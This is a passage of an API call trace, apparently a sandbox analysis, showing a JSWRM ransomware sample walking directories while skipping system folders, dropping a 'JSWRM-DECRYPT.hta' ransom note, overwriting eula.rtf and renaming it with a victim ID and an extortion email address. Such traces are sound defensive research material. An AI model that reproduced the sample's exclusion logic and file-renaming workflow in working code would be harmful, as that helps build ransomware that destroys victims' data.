[0059.828] lstrcmpiW (lpString1="SetupResources.dll", lpString2="windows") returned -1 [0059.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="recovery") returned 1 [0059.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="perflogs") returned 1 [0059.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="documents and settings") returned 1 [0059.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$RECYCLE.BIN") returned 1 [0059.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="system volume information") returned -1 [0059.866] lstrcmpiW (lpString1="SetupResources.dll", lpString2="msocache") returned 1 [0059.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0059.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x241100, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0059.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0059.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0059.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupResources.dll", cchWideChar=18, lpMultiByteStr=0x240ef8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupResources.dll", lpUsedDefaultChar=0x0) returned 18 [0059.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0059.866] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0059.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0059.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0059.866] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0059.866] FindNextFileW (in: hFindFile=0x231e80, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.866] FindClose (in: hFindFile=0x231e80 | out: hFindFile=0x231e80) returned 1 [0059.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0059.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0059.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0059.867] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfffffffe, dwReserved1=0x345f828, cFileName="1049", cAlternateFileName="")) returned 1 [0059.867] lstrcmpiW (lpString1="1049", lpString2=".") returned 1 [0059.867] lstrcmpiW (lpString1="1049", lpString2="..") returned 1 [0059.867] lstrcmpiW (lpString1="1049", lpString2="...") returned 1 [0059.867] lstrcmpiW (lpString1="1049", lpString2="windows") returned -1 [0059.867] lstrcmpiW (lpString1="1049", lpString2="recovery") returned -1 [0059.867] lstrcmpiW (lpString1="1049", lpString2="perflogs") returned -1 [0059.867] lstrcmpiW (lpString1="1049", lpString2="documents and settings") returned -1 [0059.867] lstrcmpiW (lpString1="1049", lpString2="$RECYCLE.BIN") returned 1 [0059.867] lstrcmpiW (lpString1="1049", lpString2="system volume information") returned -1 [0059.867] lstrcmpiW (lpString1="1049", lpString2="msocache") returned -1 [0059.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0059.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x226530 [0059.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.867] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1049\\jswrm-decrypt.hta")) returned 0xffffffff [0059.867] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x226530 | out: hHeap=0x1e0000) returned 1 [0059.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c52c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0059.867] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0059.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0059.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0059.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0059.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0059.868] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0059.868] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0059.868] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1049\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0059.870] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.870] WriteFile (in: hFile=0x450, lpBuffer=0x345c640*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345c60c, lpOverlapped=0x0 | out: lpBuffer=0x345c640*, lpNumberOfBytesWritten=0x345c60c*=0x230c, lpOverlapped=0x0) returned 1 [0059.871] CloseHandle (hObject=0x450) returned 1 [0059.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0059.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0059.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0059.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0059.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0059.871] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225d30 [0059.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0059.871] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\1049\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\1049\\jswrm-decrypt.hta")) returned 0x20 [0059.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225d30 | out: hHeap=0x1e0000) returned 1 [0059.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0059.872] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*.*", lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a584517, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName=".", cAlternateFileName="")) returned 0x232180 [0059.872] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0059.872] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf38014a5, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0x1a584517, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="..", cAlternateFileName="")) returned 1 [0059.872] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0059.872] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0059.872] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2=".") returned 1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2="..") returned 1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2="...") returned 1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2="windows") returned -1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2="recovery") returned -1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2="perflogs") returned -1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2="documents and settings") returned 1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2="$RECYCLE.BIN") returned 1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2="system volume information") returned -1 [0059.872] lstrcmpiW (lpString1="eula.rtf", lpString2="msocache") returned -1 [0059.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0059.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f610, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0059.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0059.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0059.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eula.rtf", cchWideChar=8, lpMultiByteStr=0x345f5e0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eula.rtf", lpUsedDefaultChar=0x0) returned 8 [0059.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0059.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0059.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0059.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0059.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0059.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0059.873] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0059.873] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=54456) returned 1 [0059.873] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.873] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4b0) returned 0x2471a8 [0059.873] ReadFile (in: hFile=0x3d4, lpBuffer=0x2471a8, nNumberOfBytesToRead=0xd4b0, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f2d4*=0xd4b0, lpOverlapped=0x0) returned 1 [0059.879] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.879] WriteFile (in: hFile=0x3d4, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0xd4b0, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f2d0*=0xd4b0, lpOverlapped=0x0) returned 1 [0059.879] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0059.880] CloseHandle (hObject=0x3d4) returned 1 [0059.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0059.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0059.881] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d4c8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0059.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0059.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0059.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0059.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0059.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0059.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0059.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0059.882] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0059.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0059.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.882] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf"), lpNewFileName="C:\\588bce7c90097ed212\\1049\\eula.rtf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\1049\\eula.rtf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0059.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0059.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0059.882] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0059.882] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a584517, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1a584517, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1a584517, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0059.882] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0059.882] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0059.883] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0059.883] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0059.883] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0059.883] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0059.883] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0059.883] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0059.883] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0059.883] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0059.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0059.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241038, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0059.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0059.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0059.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0059.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0059.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0059.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0059.883] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0059.883] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x60002, dwReserved1=0x20e44c, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2=".") returned 1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="..") returned 1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="...") returned 1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="windows") returned -1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="recovery") returned -1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="perflogs") returned -1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="documents and settings") returned 1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$RECYCLE.BIN") returned 1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="system volume information") returned -1 [0059.883] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="msocache") returned -1 [0059.883] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0059.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0059.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0059.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0059.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalizedData.xml", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalizedData.xml", lpUsedDefaultChar=0x0) returned 17 [0059.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0059.884] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0059.884] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0059.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 